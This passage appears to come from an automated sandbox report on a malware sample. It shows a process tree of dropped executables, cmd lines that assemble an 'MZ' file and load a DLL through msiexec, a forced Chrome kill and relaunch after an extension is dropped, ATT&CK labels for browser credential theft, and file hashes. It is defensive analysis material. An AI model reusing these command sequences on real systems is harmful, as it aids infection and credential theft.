        C:\Windows\system32\cmd.exe /S /D /c" ecHO "
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:100
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>PajLCM.4"
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:3116
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -y .\2KSA.GF7
        10⤵
        Loads dropped DLL
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        
        PID:4788
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -iM "Sat142b09ae40c44cf.exe" /f
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1328
  - - C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat14514904a4b.exe
      Sat14514904a4b.exe
      4⤵
      Executes dropped EXE
      PID:3712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2952
  - - C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat14d32a38896785b13.exe
      Sat14d32a38896785b13.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4676
  - - C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat14febbc433.exe
      Sat14febbc433.exe /mixone
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1068
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 620
        5⤵
        Program crash
        
        PID:1144
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 620
        5⤵
        Program crash
        
        PID:3064
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 640
        5⤵
        Program crash
        
        PID:1616
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 780
        5⤵
        Program crash
        
        PID:2724
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 660
        5⤵
        Program crash
        
        PID:4848
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 792
        5⤵
        Program crash
        
        PID:2360
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 1048
        5⤵
        Program crash
        
        PID:3604
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 1056
        5⤵
        Program crash
        
        PID:4168
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 1324
        5⤵
        Program crash
        
        PID:4828
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 1216
        5⤵
        Program crash
        
        PID:1336
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 892
        5⤵
        Program crash
        
        PID:5396
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 1104
        5⤵
        Program crash
        
        PID:1020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4604
  - - C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat142ac5249376e895.exe
      Sat142ac5249376e895.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:400
  - - C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat1487ca754e680f91.exe
      Sat1487ca754e680f91.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1856
  - - C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat144474a564d26f29.exe
      Sat144474a564d26f29.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2584
  - - C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat14b47e86b9c16b.exe
      Sat14b47e86b9c16b.exe
      4⤵
      Executes dropped EXE
      Drops Chrome extension
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:8
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2280
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:664
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        5⤵
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4420
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff971e5cc40,0x7ff971e5cc4c,0x7ff971e5cc58
        6⤵
        
        PID:2644
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1956,i,9013485277423067451,13767215887456054470,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1948 /prefetch:2
        6⤵
        
        PID:1044
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2088,i,9013485277423067451,13767215887456054470,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2092 /prefetch:3
        6⤵
        
        PID:4148
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2284,i,9013485277423067451,13767215887456054470,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2252 /prefetch:8
        6⤵
        
        PID:3552
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,9013485277423067451,13767215887456054470,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3164 /prefetch:1
        6⤵
        
        PID:704
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3128,i,9013485277423067451,13767215887456054470,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:1
        6⤵
        
        PID:3420
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4532,i,9013485277423067451,13767215887456054470,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4584 /prefetch:1
        6⤵
        
        PID:1352
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4700,i,9013485277423067451,13767215887456054470,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4716 /prefetch:8
        6⤵
        
        PID:4544
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5088,i,9013485277423067451,13767215887456054470,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5100 /prefetch:8
        6⤵
        
        PID:2524
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4556,i,9013485277423067451,13767215887456054470,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5148 /prefetch:8
        6⤵
        
        PID:5112
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,9013485277423067451,13767215887456054470,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4940 /prefetch:8
        6⤵
        
        PID:4432
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5016,i,9013485277423067451,13767215887456054470,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5320 /prefetch:8
        6⤵
        
        PID:3640
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3696,i,9013485277423067451,13767215887456054470,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5464 /prefetch:8
        6⤵
        
        PID:1580
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5268,i,9013485277423067451,13767215887456054470,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5228 /prefetch:2
        6⤵
        
        PID:6060
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5188,i,9013485277423067451,13767215887456054470,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:8
        6⤵
        
        PID:4500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4168
  - - C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat1427fbafcf251.exe
      Sat1427fbafcf251.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:1836
    - - C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat1427fbafcf251.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat1427fbafcf251.exe
        5⤵
        Executes dropped EXE
        
        PID:2380
    - - C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat1427fbafcf251.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat1427fbafcf251.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:740
  - - C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat1481f5a7e3eccdd.exe
      Sat1481f5a7e3eccdd.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1032
    - - C:\Users\Admin\AppData\Local\Temp\is-75B8U.tmp\Sat1481f5a7e3eccdd.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-75B8U.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$50256,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat1481f5a7e3eccdd.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1036
      - C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat1481f5a7e3eccdd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat1481f5a7e3eccdd.exe" /SILENT
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2536
        
        C:\Users\Admin\AppData\Local\Temp\is-MDRT6.tmp\Sat1481f5a7e3eccdd.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-MDRT6.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$A0274,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat1481f5a7e3eccdd.exe" /SILENT
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4944
  - - C:\Users\Admin\AppData\Local\Temp\7zS0E24CAB7\Sat14a7594cc5a0116.exe
      Sat14a7594cc5a0116.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks SCSI registry key(s)
      PID:3928
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3928 -s 356
        5⤵
        Program crash
        
        PID:5048
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2040 -s 596
    3⤵
    - Program crash
    PID:3620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2040 -ip 2040
1⤵
PID:4848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3928 -ip 3928
1⤵
PID:2944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1068 -ip 1068
1⤵
PID:3640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1068 -ip 1068
1⤵
PID:2928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1068 -ip 1068
1⤵
PID:3172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1068 -ip 1068
1⤵
PID:4200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1068 -ip 1068
1⤵
PID:1648

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1068 -ip 1068
1⤵
PID:3620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1068 -ip 1068
1⤵
PID:4768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1068 -ip 1068
1⤵
PID:4760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1068 -ip 1068
1⤵
PID:3988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:8

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1068 -ip 1068
1⤵
PID:5340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1068 -ip 1068
1⤵
PID:4672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1068 -ip 1068
1⤵
PID:2032

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\2e8fdf19-5b22-402d-8fd5-ead0462f4774.tmp

Filesize
19KB

MD5
54008fdd4479b87951c4fac640546e8d

SHA1
b156295943de88c3f0fd7e1a2c53e677b68055f5

SHA256
6000fa70a46114ee7db509466bc9eb03a7fe6301a1ccbe505b4c66625e505fa6

SHA512
fa502d5ec3981f986b15f8e8e442a42929358575dcc09369ed12d3b1595770fb9a6765dd858ad7e2faa4680cb0e0e058e4e35ae01006a9275a34509d1c4c91a6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
2f48175ddf36c3bdc412b253d2260899

SHA1
fa497717c8f6c604f96298e3c7ce2075648e6a29

SHA256
5ee6483859f5e6e0e77263d0a666c35070f782960f3997dd7f67e10f2f23fa33

SHA512
403f6c41008ccf38e37ea974a39c2d2e55a2bc4e8c02cfe15a17b5313ace3d5603e1cd77352d0e3b7fd37e40547c5820a9b375b4627d485053fee34a7ca43dc3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
2bac99e129e24aeeca6f68e849d8f262

SHA1
0dfdb6604381bb7a5a46b2284c6f5007b2242050

SHA256
3cb32a407bd5d5f61389dc0255887081b465a314451f43b838485cce7e07e6e4

SHA512
60fb1f653985cd4c18670adfd614d621a81d130c49c4fc386ffe93a8830ca88d8712f204bc145bd479e881db2c24410f6b8ac7bd07c1c31b91e8996560139664

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
85aa3577ef857097c85b7ad789beca96

SHA1
84f4cd67f8c56070e7864e0d3e73028d7555da94

SHA256
34ac819351f09c41dadb28653200b730f1d37a252c172f3280efca3695edf12b

SHA512
29ecdca44e54e76ffa0e3833c7ec8eaea2090fcca1792da60754d638de87703a9301466c4711aeb0bf723cfd5d5316d687b4562122ce3c0efa50d16f9d8900f9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
0eb9321f03202bb69c73fb66fe99b3c2

SHA1
492ab69198b37b3052688ed3d7ef331e8aec61ce

SHA256
97a9d38f1d5c7fc89fb06b4d3e7b4235cafa17731a6c0c9a0461079934d70a32

SHA512
4ac71db10cc896c3c59ebdc7ad268f60c5f6408daa1f5e8bbfa8d62bcc79e2c4ef5825e29f28f1fac68bccdf074686f3659d6168970775297c83dbbd5466d829

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
7122d8ca16dbe721904c2e8f78ad134b

SHA1
6b0bf9031165497d9753d7a756a68084517e6cfb

SHA256
4f272ac1ad7eb5d24c1c9496935284e5b7be48e39bcd95dd66543e538e5c5300

SHA512
5f8d95b2f564339b7d993d8afee148601d1601213b71989cdc1ce2e9883d355c17388b38a29e2c8b9cf4911d70496f8629853bb8014efbf617e2f8e7355b08bc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
1dfd166d0f951bd1a0e6ff2d526b778d

SHA1
90d818a520acb2c251d0e6b77a9f104370215c99

SHA256
e127bd01adea531476bbc02c9bc4d7a589b93fde59901e33f93223607033ad0f

SHA512
d3d88bda4add786948a76e327b8fa77e05393c12ac0bbf07188a2fb0b7243fab2a00f0035b1405ccc6df702e5dcdad0606e6e6e2cfdf1b5ded517dd1c9f3d87a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
18KB

MD5
8bef3f29eb363e960afa7d6b45f5b832

SHA1
c0dd81d51b9b1bb218600689484cb4ea6c77bf8e

SHA256
fd75b3e66ce374b20ec526fc3969a8e7171033ac83891c5df855b14fcf951c97

SHA512
598dfb727320cd698af485891945ba93e187fee4469be5d032b2694e8e9640caa1f6bfab64b6dff13e352320976dd5c6e4a18893c8a57f14d96307a0963ff946

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
18KB

MD5
6d6e418c5713be2327aa980931d4c266

SHA1
676ad3f0afb83ab09998912de8c410256af4011a

SHA256
2a3ffb9c0060551fdcef9357e1aef04724f84d63545d53f5bdfe4d797f5cb044

SHA512
ec4d55a5d16bfb335f21a7999c64fd584d6cd98bbefcac994b12a9a75512f3ad652fd28ddc203dba6276480e9d5610334600d0a51f955c74e346d34b6ebf8f35

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
19KB

MD5
924aba9d2b61a74725b09bfbf121ffe5

SHA1
1189b7b3e7ea913fe2b2c31d7022d81226e9e54e

SHA256
b3314bb5877b6f58fdf05fefc0dc37d56436546ee78bd7050b6c61be28fc5ec6

SHA512
2a0429793514b2c6aa9231535a52a8ab83b651a874de7c29da2f1b067e4ba1f72bc7f098b480d43081d23181838b7dc74024cf35ecff16a0beceac261cf6783f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
56f88d5d347f64231763025b663f1375

SHA1
cf3b462b6a5b2c7ac2ab7e6261f9df5ab4a18430

SHA256
824eba539ef1687cbfade24eee051faf845e9359e1b67a4d25c076e3a8631864

SHA512
596d71c50cf77d02c7b8c9350d3adc58ba60c243b3bd7a1d5712460d2554a51dfc45179c5080014c9f210e989906995d146eef9e2597e3055f0de4ba334a7550

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
231KB

MD5
0c1c63dc6173b702442ec389bceb0b7c

SHA1
73765e4d800658fad1abfbf022821497b3f7989a

SHA256
14bb9fef5ae53016b202996ae611867e4184e777b3fd64fc209dbcccace4346b

SHA512
a9459ad592235257a7fc3638a1916b5aaf0a17961e18598b39ec7a8bea7983f172725a4bed8a34973c7a1f48fa96b1eacc97cc3913d520e8ca4cc9a6e25bcaaf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
231KB

MD5
8360d68adc4946762d4e9ff693d5689e

SHA1
d00e2f1763cf4ad6ae9a96df57b8b538161605bc

SHA256
47f7b2c363b1763f4415657690bf9a1d97a711c17130e6324f465048b4781bff

SHA512
08e81e55069b79ba2161ab6f12a1b9f1d2b4b29973f7c6a0594a6196c1f42a34c38f9f5b30271c69ea7a6c047d5736d7796b0809f6af3fd6c5638d9df2727b22

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
5b5441781bd778e479d94278afc6caa4

SHA1
5a9cfcf0dd26b07e5a8b5a303df7ef336076955a

SHA256
9221a3f15a2e162b4f847b29aec01f526af211a6c07701d1c25d30b7a89ba083

SHA512
e6393ce477645b7d913dfc0cff557a34ac7bc94ecc253a9ad5e030ab3811a4dd37d3ced0a4e8a5123ac4e278d3bf68eccfa51a102f8b47ca0898a05197235752

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sat1427fbafcf251.exe.log

Filesize
700B

MD5
e5352797047ad2c91b83e933b24fbc4f

SHA1
9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772

SHA256
b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c

SHA512
dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
